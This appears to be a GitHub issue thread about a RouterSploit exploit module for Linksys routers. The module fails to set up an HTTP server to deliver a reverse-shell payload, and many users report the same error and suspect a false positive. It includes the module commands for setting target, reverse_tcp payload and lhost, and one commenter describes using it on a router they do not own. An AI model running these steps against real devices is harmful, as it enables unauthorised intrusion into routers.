Could not set up HTTP server on lhost / can't transfer payload

[jansramek]

Current Behavior

• Crashes when attempting to transfer payload/setting HTTP server (should be vulnerable)
• Same behaviour on Mac OS & Kali Linux

cmd (MIPSLE Reverse TCP) > run [*] Using wget method [-] Could not set up HTTP Server on 192.168.0.102:5555 [-] Exploit failed to transfer payload

Expected Behavior

• Should open reverse shell

Steps to Reproduce (for bugs)

1. use exploits/routers/linksys/eseries_themoon_rce
2. set target 192.168.0.1
3. run
4. set payload reverse_tcp
5. set lhost 192.168.0.102
6. run

Environment

• RouterSploit Version used: 3.4.0 (on both OS)
• Operating System and version: Mac OS 10.14.1 | Kali Linux 2018.1
• Python Version: 3.7.1 | 3.6.7
• Python Environment: asn1crypto==0.24.0 bcrypt==3.1.4 certifi==2018.10.15 cffi==1.11.5 chardet==3.0.4 cryptography==2.3.1 future==0.16.0 idna==2.7 paramiko==2.4.2 ply==3.11 pyasn1==0.4.4 pycparser==2.19 pycryptodome==3.6.6 pycryptodomex==3.6.6 PyNaCl==1.3.0 pysmi==0.3.1 pysnmp==4.4.6 requests==2.20.0 six==1.11.0 urllib3==1.24

[stefan9999991]

have the exact same problem! Please notify me if you find something that helps you.

[hackmybeer]

Got the same problem, please notify me tooo (:

[stefan9999991]

Any solutions yet?

[GianisTsol]

Also having it :( notif me when you find a solution

[Keskebeu]

Same here.

[Bbcomb]

same lol.

[Keskebeu]

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

[KentuckyJohnOliver]

Exact same here. However I can verify the router I'm scanning is NOT a Linksys router.

[jansramek]

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on non Linksys router. It is probably false positive.

[Keskebeu]

Could be the case. The router I tried it on was a linksys router. When I used it in a Motorola router nothing came up. I also read somewhere else that it had to with that and we are expected to change the code based on the linksys router.

It could be a router which is made by Linksys or uses Linksys components and or software, just different name.

On Tue, Jan 15, 2019, 6:21 AM jansramek <notifications@github.com wrote:

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on non Linksys router. It is probably false positives.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/threat9/routersploit/issues/550#issuecomment-454358347, or mute the thread https://github.com/notifications/unsubscribe-auth/AYP2GFMPl0LYgprtjFH9yMnhWzCjfGi9ks5vDbmbgaJpZM4YoDFv .

[ghost]

same here

[sudo-jake]

I'm also having that issue but I think I might have found a fix keyword "might" make sure apache is started by typing "sudo service apache2 start"

[Hayzr]

Looks like a false positive. If you go through the logs it uses an HTTP GET for the tmUnblock.cgi file. It marks a successful GET as Vulnerable.

You can wget the file yourself: wget /tmUnblock.cgi Compare it to the source code for the login screen. In my case, they're the same.

[HarizDharma]

same here. i got this problem, how to solve ?

[evoke0]

I also have the same problem. Although it marks the router as vulnerable, I can confirm that the router is not Linksys, so it might me a false positive but I wonder why the HTTP server error occurs. Setting up the server on lhost shouldnt be related to the payload working or not against the router. Any thoughts on this?

The fact of this issue being open since 2018 is not a good sign.

[ghost]

i get this too

[sealoomaan]

Anybody here found the solution ?

[l014]

Same error, but if I set a port that the router is using for other tcp/udp connections the payload is being handled somehow, i think anyway,

The router is a Huawei DG8245W2-10, not mine so I don't know fw v, the owner have forgotten the admin passw.

Here is the handshake - payload scr->wireshark

At first glance the response looked like a normal POST to /tmUnblock.cgi
....but there is something

[gabriel2018-27]

heeeeeeeelp!!

[blackerr]

any solution?

[OmiceyO]

2021 still doesnt work. Probably as the guy send above its a "False Positive"

[cm038]

any solution?

I have same problem

[cm038]

Nobody ?

[cm038]

Hey... When i chance the lport it comes step closer

cmd (MIPSLE Bind TCP) > set lport 8080
lport => 8080
cmd (MIPSLE Bind TCP) > run

[] Using wget method
[] Using wget to download binary
[-] Exploit failed to transfer payload

[overtimepog]

yeah still getting this, no idea whats going on, false-positive seems the most likely

[imansour12]

getting this too

[andvargrad]

I have same problem

[mariosacaj]

I think the "Could not set up HTTP server on lhost" message is displayed because it attempts at opening a new connection on the specified port without killing the first one, or something like this.

[Codeiology]

I tried the checker for this exploitation module on a non-link sys router, and it showed up as vulnerable, but had the same issue. I think we can confirm this is a false positive now.

[Dlazder]

I have the same problem(

[Munkhbadral1]

same

[cankaygisiz]

any update for this problem?

[iqnnis]

had this also

[Mohamed3bdelwahab]

still issue exist is there any working methods